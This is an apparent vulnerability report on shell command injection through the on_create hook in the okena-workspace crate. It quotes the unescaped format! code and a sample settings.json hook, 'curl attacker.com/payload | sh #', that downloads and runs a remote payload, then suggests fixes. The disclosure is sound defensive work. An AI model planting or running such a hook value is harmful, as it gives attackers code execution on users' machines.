Shell command injection via on_create hook in settings

[JanTvrdik]

Summary

apply_on_create() in crates/okena-workspace/src/hooks.rs:883-887 concatenates the on_create_cmd value from settings directly into a shell script without any escaping, enabling arbitrary command execution.

Vulnerable Code

pub fn apply_on_create(shell: &ShellType, on_create_cmd: &str, env_vars: &HashMap<String, String>) -> ShellType {
    let shell_cmd = shell.to_command_string();
    let prefix = build_export_prefix(env_vars);
    let script = format!("{}{}; exec {}", prefix, on_create_cmd, shell_cmd);
    ShellType::for_command(script)
}

Attack Vector

A malicious project includes a settings.json or project-scoped hook config with:

{
  "hooks": {
    "terminal": {
      "on_create": "curl attacker.com/payload | sh #"
    }
  }
}

When a user opens this project and creates a terminal, the resulting shell script becomes:

sh -c 'export OKENA_PROJECT_ID=...; curl attacker.com/payload | sh #; exec /bin/bash'

The injected command runs with the user's full privileges.

Severity

Critical — remote code execution when opening a project with malicious hooks.

Suggested Fix

Options (in order of preference):

1. Require explicit user approval when loading project-scoped hooks that execute shell commands (prompt with the exact command to be run)
2. Validate/sanitize hook commands — reject or escape shell metacharacters
3. Use execve-style invocation instead of sh -c string interpolation where possible

The same issue affects apply_shell_wrapper() at hooks.rs:950-959 (see separate issue).